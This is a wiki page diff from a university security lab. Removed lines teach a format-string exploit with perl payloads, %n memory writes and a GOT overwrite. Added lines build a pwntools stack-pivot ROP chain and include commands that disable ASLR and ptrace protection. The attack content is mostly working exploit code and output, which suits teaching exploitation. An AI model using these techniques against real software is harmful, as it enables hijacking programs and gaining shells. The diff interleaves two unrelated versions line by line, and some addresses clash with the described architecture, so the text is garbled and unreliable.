-main(int argc, char *argv[]) +ret
-+
- printf(argv[1]);​ +
- printf("​\nThis is the most useless and insecure program!\n"​);​ +
- return 0; +
-}+
 </​code>​ </​code>​
  
-=== Transform Format String Attack to a Memory Write ===+If we look around in the disassembled functions, we notice that ''​play''​ has just what we need at the end:
  
-Any string that represents a useful format (e.g. ''​%d'',​ ''​%x''​ etc.) can be used to discover the vulnerability. +<​code ​asm
-<​code ​bash+   0x00000000004012ae <​+49>:​ call ​  ​0x401050 <​read@plt>​ 
-$ ./format "%08x %08x %08x %08x" +   0x00000000004012b3 <​+54>:​ leave  ​ 
-00000000 f759d4d3 00000002 ffd59bd4 +   0x00000000004012b4 <​+55>:​ ret ​
-This is the most useless and insecure program!+
 </​code>​ </​code>​
  
-The values starting with 0xf are very likely pointers. Again, we can use this vulnerability as a information leakage. But we want more.+We will use this sequence to pivot the stack.
  
-Another useful format for us is ''​%m$'' ​followed by any normal format selector. Which means that the ''​m''​th parameter is used as an input for the following format. ​''​%10$08x'' ​will print the ''​10''​th paramater with ''​%08x''​. This allows us to do a precise access of the stack.+Our payload must do a call to ''​read(0, pivot, size);''​, so the registers should look as follows when reaching ​''​ret''​:
  
-Example: +<​code>​ 
-<​code ​bash+[RSP-8] ​ <​pivot-8> ​      # Overwrite RBP 
-$ ./​format ​"%08x %08x %08x %08x %1\$08x %2\$08x %3\$08x %4\$08x+[RSP]    <call read> 
-00000000 f760d4d3 00000002 ff9aca24 00000000 f760d4d3 00000002 ff9aca24 +[RDI]  0x0             # stdin 
-This is the most useless and insecure program!+[RSI]  <​pivot> ​        # ​"buffer
 +[RDX] 0x200           # size
 </​code>​ </​code>​
-Note the equivalence between formats. 
  
-Nowbecause we are able to select //any// higher address with this function and because ​the buffer ​is on the stack, sooner or later we will discover our own buffer. +<note important>​You might not find a ''​pop rdx''​ gadget in the binarybut luckily ​the ''​rdx''​ register ​is not changed after the ''​read''​ call in the main program so it should have a large enough value already set. </note>
-<code bash> +
-$ ./format "​$(perl -e 'printf "​%%08x\x0a"​x10000')"  +
-</code>+
  
-Depending on your setup you should ​be able to view the hex representation of the string "​%08x\n"​.+With all the pieces in place, we should ​have a working pivoting payload:
  
-**Why do we need our own buffer?** Remember the ''​%n''​ format? It can be used to write at an address given as parameter. The idea is to give this address as parameter and achieve memory writing. We will see later how to control the value.+<code python>​ 
 +#​!/​usr/​bin/​env python 
 +from pwn import ​*
  
-The next steps are done with ASLR disabledIn order to disable ASLR, please run +io = process('​./​task1'​) 
-<code bash> + 
-echo 0 | sudo tee /​proc/​sys/​kernel/​randomize_va_space +# Useful values 
-</​code>​+ret_offset = 56 
 +call_read = 0x401050 
 +pivot = 0x404000
  
-By trial and error or by using GDB (breakpoint on ''​printf''​) we can determine 
-<code bash> 
-$ ./format "​$(perl -e '​printf "​A"​x512 . "​%%08x ​  ​\x0a"​x200'​)" ​ | grep -n 41 | head 
-17:​415729ac ​   
-56:​ffffdd41 ​   
-128:​41007461 ​   
-129:​41414141 ​   
-130:​41414141 ​ 
-</​code>​ 
  
-<​note>​ +# Construct payloads
-Command line Perl/Python exploits tend to get very tedious and hard to read when the payload gets more complex. You can use the following reference Perl script to write your exploit. The code is equivalent to the above one-liner.+
  
-<code perl> +payload1 = '​A'​*(ret_offset - 8) 
-#!/​usr/​bin/​env perl+payload1 += p64(pivot-8) 
 +payload1 += TODO  ​#pop rdi; ret 
 +payload1 += p64(0) 
 +payload1 += TODO  #pop rsi; ret 
 +payload1 += p64(pivot) 
 +payload1 += TODO  #pop rdx; ret 
 +payload1 += p64(100)
  
-use strict; +payload1 += p64(call_read) 
-use warnings; +payload1 += p64(0x4012b3) (leave after read)
-use v5.20;+
  
-my $stack_items = 1000;+log.info(io.recvline()) 
 +log.info(io.recvline()) 
 +gdb.attach(io) 
 +raw_input("​Send payload?"​) 
 +io.sendline(payload1)
  
-printf "​A"​ x 512; +io.interactive()
-printf "​%%08x ​  ​\x0a"​ x $stack_items;​+
 </​code>​ </​code>​
  
-Then call the ''​format''​ using (note the enclosing double-quotes):+In order to see pivoting in action, do the following:
  
 <​code>​ <​code>​
-./format "​$(perl exploit.pl)"+./test.py 
 +[+] Starting local process '​./​task1':​ Done 
 +[*] Welcome to our Retired Old Programmers message board! 
 +[*] Please leave a message:  
 +[*] running in new terminal: gdb -q  "/​task1" ​4770 
 +[+] Waiting for debugger: Done 
 +Send payload? ​
 </​code>​ </​code>​
-</​note>​ 
  
-One idea is to keep things in multiple of 4, like I did for "​%08x ​  ​\x0a"​If you are looking ​at line ''​128''​, one of our ''​A''​s is thereBecause ​the machine is little endian, ​the 0x41 appears as most significant byte. We want to fix thisto have our buffer alignedNote, you can add as many format strings you want, the start of the buffer ​will be the same (more or less).+This will spawn a new ''​gdb-peda''​ windowSet a breakpoint ​at the return address of ''​play'' ​(''​0x0804862c''​) then ''​continue''​. ​In the other window (the one waiting for you to answer ''​Send payload?''​)hit ''​Enter''​You will notice gdb hits the breakpoint and now you can single step (via ''​ni''​).
  
-We can compress our buffer by specifying the position of the argument. +<note important
-<code bash+There is an issue in the stations in the lab when running GDB/PEDA from ''​pwntools''​. The issue is signaled at [[http://​askubuntu.com/​questions/​41629/​after-upgrade-gdb-wont-attach-to-process|this link]]. You will have to issue the command below to solve the issue
-$ ./format "​$(perl -e '​printf "​BCDE"​."​A"​x510 . "​%%126\$08x"'​)"​ +
-BCDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA45444342 +
-This is the most useless and insecure program! +
-</code> +
-You can see that the last information is our "​BCDE"​ string printed with ''​%08x''​ this means that we know where'​s our buffer. +
- +
-<note tip> +
-You need to enable core dumps in order to reproduce ​the steps below:+
 <​code>​ <​code>​
-$ ulimit -c unlimited+echo 0 | sudo tee /​proc/​sys/​kernel/​yama/​ptrace_scope
 </​code>​ </​code>​
 </​note>​ </​note>​
  
-<​note>​ +Once you reach ''​call read'',​ gdb will block. In the pwntools interactive window, give an input such as ''​AAAAAAAA''​ to complete the read call and unblock gdbContinue stepping until you reach the ''​leave'' ​instruction. Notice how the value of ''​rbp+8'' ​gets written over ''​rsp''​. The following ''​ret''​ instruction will take you to your pivot addressat which you will find your ''​AAAAAAAA''​.
-The steps below work an a given version of libc and a given systemIt's why the instruction ​that causes ​the fault is<​code>​ +
-mov %edx,​(%eax) +
-</​code>​ +
-or the equivalent in Intel syntax<​code>​ +
-mov DWORD PTR [eax], edx +
-</​code>​ +
-It may be different on your system, for example ​''​edx'' ​may be replaced by ''​esi'', ​cuch as<​code>​ +
-mov DWORD PTR [eax], esi +
-</​code>​ +
-Update the explanations below accordingly. +
-</​note>​+
  
-<​note>​ +=== Second stage payload ​ ===
-Remove any core files you may have generated before testing your program:<​code>​ +
-rm -f core +
-</​code>​ +
-</​note>​+
  
-We can replace ''​%08x''​ with ''​%n''​ this should lead to segmentation fault. +Now you are set to write a fully working ropchain ​to sequentially call the three functions in order to open, read and print the contents of the flag file.
-<code bash> +
-$ ./format "​$(perl -e '​printf "​BCDE"​."​A"​x510 . "​%%126\$08n"'​)"​ +
-Segmentation fault (core dumped) +
-$ gdb ./format -c core +
-... +
-Core was generated by `./format BCDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'​. +
-Program terminated with signal 11, Segmentation fault. +
-#0  0xf7e580a2 in vfprintf () from /​lib/​i386-linux-gnu/​libc.so.6 +
-(gdb) bt +
-#0  0xf7e580a2 in vfprintf () from /​lib/​i386-linux-gnu/​libc.so.6 +
-#1  0xf7e5deff in printf () from /​lib/​i386-linux-gnu/​libc.so.6 +
-#2  0x08048468 in main (argc=2, argv=0xffffd2f4) at format.c:​18 +
-(gdb) x/i $eip +
-=> 0xf7e580a2 <​vfprintf+17906>:​ mov ​   %edx,​(%eax) +
-(gdb) info registers $edx $eax +
-edx            0x202 514 +
-eax            0x45444342 1162101570 +
-(gdb) quit +
-</​code>​ +
-Bingo. We have memory ​write. The vulnerable code tried to write at the address ''​0x45444342''​ ("​BCDE"​ little endian) ​the value 514. The value 514 is the amount of data wrote so far by ''​printf''​ (510 ''​A''​s and "​BCDE"​).+
  
-Right now, our input string has 518 bytes. But we can further compress it, thus making the value that we write independent of the length of the input. +===== Resources ​=====
- +
-<code bash> +
-$ ./format "​$(perl -e '​printf "​BCDE"​. "​A"​x506 . "​%%99x"​ . "​%%126\$08n"'​)"​ +
-Segmentation fault (core dumped) +
-$ gdb ./format -c core +
-(gdb) info registers $edx $eax +
-edx            0x261 609 +
-eax            0x45444342 1162101570 +
-(gdb) quit +
-</​code>​ +
-Here we managed to write 609 (4+506+99). Note we should keep the number of bytes before the format string the same. Which means that if we want to print with a padding of 100 (three digits) we should remove one ''​A''​. You can try this by yourself. +
- +
-**How far can we go?** Probably we can use any integer for specifying the number of bytes which are used for a format, but we don't need this; moreover specifying a very large padding is not always feasible, think what happens when printing with ''​snprintf''​. 255 should be enough. +
- +
-Remember, we want to write a value to a certain address. So far we control the address, but the value is somewhat limited. If we want to write 4 bytes at a time we can make use of the endianess of the machine. **The idea** is to write at the address n and then at the address n+1 and so on. +
- +
-Lets first display the address. We are using the address ''​0x804a008''​. This address is the address of the got entry for the puts function. Basically, we will override the got entry for the puts. +
- +
-<code bash> +
-$ objdump -R ./format | grep puts +
-0804a008 R_386_JUMP_SLOT ​  ​puts +
-$ ./format "​$(perl -e '​printf "​\x08\xa0\x04\x08"​. "​\x09\xa0\x04\x08"​ . "​\x0a\xa0\x04\x08"​. "​\x0b\xa0\x04\x08"​ . "​A"​x498 . "​%%255x|"​ . "​%%126\$08x"​ . "​%%255x|"​ . "​%%127\$08x"​ . "​%%255x|"​ . "​%%128\$08x"'​)"​ +
- +
- +
-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ... +
-0|0804a008 +
-f7e2a4d3|0804a009 +
-2|0804a00a +
-ffffd2c4|0804a00b +
-                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            This is the most useless and insecure program! +
- +
-</​code>​ +
-Why are we printing 498 ''​A''​s?​ We added 12 bytes before our format and 6 extra bytes for the output -- the ''​|''​ is there only for pretty print. We want to keep in place the first argument -- anyway, you should always check this. +
- +
-Lets replace the ''​%x''​ with ''​%n''​ +
-<code bash> +
-$ ./format "​$(perl -e '​printf "​\x08\xa0\x04\x08"​. "​\x09\xa0\x04\x08"​ . "​\x0a\xa0\x04\x08"​. "​\x0b\xa0\x04\x08"​ . "​A"​x498 . "​%%255x|"​ . "​%%126\$08n"​ . "​%%255x|"​ . "​%%127\$08n"​ . "​%%255x|"​ . "​%%128\$08n"​ . "​%%255x|"​ . "​%%129\$08n"'​)"​ +
-$ gdb ./format -c core +
-Program terminated with signal 11, Segmentation fault. +
-#0  0x02020202 in ?? () +
-(gdb) x/x 0x0804a000 +
-0x804a000 <​printf@got.plt>:​ 0xf7e5ded0 +
-(gdb) x/x 0x0804a004 +
-0x804a004 <​fwrite@got.plt>:​ 0x08048396 +
-(gdb) x/x 0x0804a008 +
-0x804a008 <​puts@got.plt>:​ 0x02020202 +
-(gdb) x/x 0x0804a00c +
-0x804a00c <​__gmon_start__@got.plt>:​ 0x08000006 +
-(gdb)  +
-</​code>​ +
- +
-In the gdb session above you can see: +
-  - the got entry for printf points to a library address (the address starts with 0xf) +
-  - the got entry for fwrite points to some code inside the binary. This means that the function wasn't yet called, the loader didn't load this address yet. +
-  - the puts entry points to 0x02020202. This is the value that we wrote. +
- +
-**How come we wrote the first ''​0x02''?​** +
-Just before executing the first ''​%n''​ the vulnerable code printed 770 (4*4+498+256) bytes and hex(770) ​== 0x302. +
- +
-**How come the rest of the bytes are ''​0x02''?​** +
-After executing the first ''​%n''​ we printed another 256 bytes before each ''​%n''​ so we actually wrote 0x402, 0x502 and 0x602. You can see that the last three bytes ''​%%__gmon_start__@got.plt%%''​ are ''​0x000006''​. +
- +
-We want to put the value ''​0x08048494''​. +
-<code bash>  +
-$ objdump -d ./format | grep my_evil +
-08048494 <​my_evil_func>:​ +
-</​code>​ +
-The first byte is ''​0x94''​ (little endian), recall that we were able to write ''​0x02'',​ writing ''​0x94''​ means replacing first 255 with 255-(0x102-0x94) ​== 145. +
-<code bash> +
-$ ./format "​$(perl -e '​printf "​\x08\xa0\x04\x08"​. "​\x09\xa0\x04\x08"​ . "​\x0a\xa0\x04\x08"​. "​\x0b\xa0\x04\x08"​ . "​A"​x498 . "​%%145x|"​ . "​%%126\$08n"​ . "​%%255x|"​ . "​%%127\$08n"​ . "​%%255x|"​ . "​%%128\$08n"​ . "​%%255x|"​ . "​%%129\$08n"'​)"​ +
-$ gdb ./format -c core +
-#0  0x94949494 in ?? () +
-(gdb) quit +
-</​code>​ +
-The next byte that we want to write is ''​0x84''​ so we need to replace 255 with 235. We can continue this idea until we profit. +
-<code bash> +
-$ ./format "​$(perl -e '​printf "​\x08\xa0\x04\x08"​. "​\x09\xa0\x04\x08"​ . "​\x0a\xa0\x04\x08"​. "​\x0b\xa0\x04\x08"​ . "​A"​x498 . "​%%145x|"​ . "​%%126\$08n"​ . "​%%239x|"​ . "​%%127\$08n"​ . "​%%127x|"​ . "​%%128\$08n"​ . "​%%259x|"​ . "​%%129\$08n"'​)"​ | tr -s ' ' > /dev/null +
-I'm evil, but nobody calls me :-( +
-</​code>​ +
- +
-**[1p] Bonus task** Can you get a shell? (Assume ASLR is disabled). +
- +
-===== Mitigation and Recommendations ​==== +
- +
-  - Manage the string length carefully +
-  - Don't use ''​gets''​. With ''​gets''​ there is no way of knowing how much data was read +
-  - Use string functions with ''​n''​ parameter, whenever a non constant string is involved. i.e. ''​strnprintf'',​ ''​strncat''​. +
-  - Make sure that the ''​NUL''​ byte is added, for instance ''​strncpy''​ does **not** add a ''​NUL''​ byte. +
-  - Use ''​wcstr*''​ functions when dealing with wide char strings. +
-  - Don't trust the user! +
- +
-===== Real life Examples ===== +
- +
-  * [[http://​xkcd.com/​1354/​|Heartbleed]] +
-  * Linux kernel through 3.9.4 [[http://​www.cvedetails.com/​cve/​CVE-2013-2851/​|CVE-2013-2851]]. The fix is [[http://​marc.info/?​l=linux-kernel&​m=137055204522556&​w=2|here]]. More details [[http://​www.intelligentexploit.com/​view-details-ascii.html?​id=16609|here]]. +
-  * Windows 7 [[http://​www.cvedetails.com/​cve/​CVE-2012-1851/​|CVE-2012-1851]]. +
-  * Pidgin off the record plugin [[http://​www.cvedetails.com/​cve/​CVE-2012-2369|CVE-2012-2369]]. The fix is [[https://​bugzilla.novell.com/​show_bug.cgi?​id=762498#​c1|here]]+
  
 +  * [[http://​neilscomputerblog.blogspot.ro/​2012/​06/​stack-pivoting.html|More about stack pivoting and creating a "fake stack"​]]
cns/labs/lab-09.1512400614.txt.gz · Last modified: 2017/12/04 17:16 by razvan.deaconescu
CC Attribution-Share Alike 3.0 Unported
www.chimeric.de Valid CSS Driven by DokuWiki do yourself a favour and use a real browser - get firefox!! Recent changes RSS feed Valid XHTML 1.0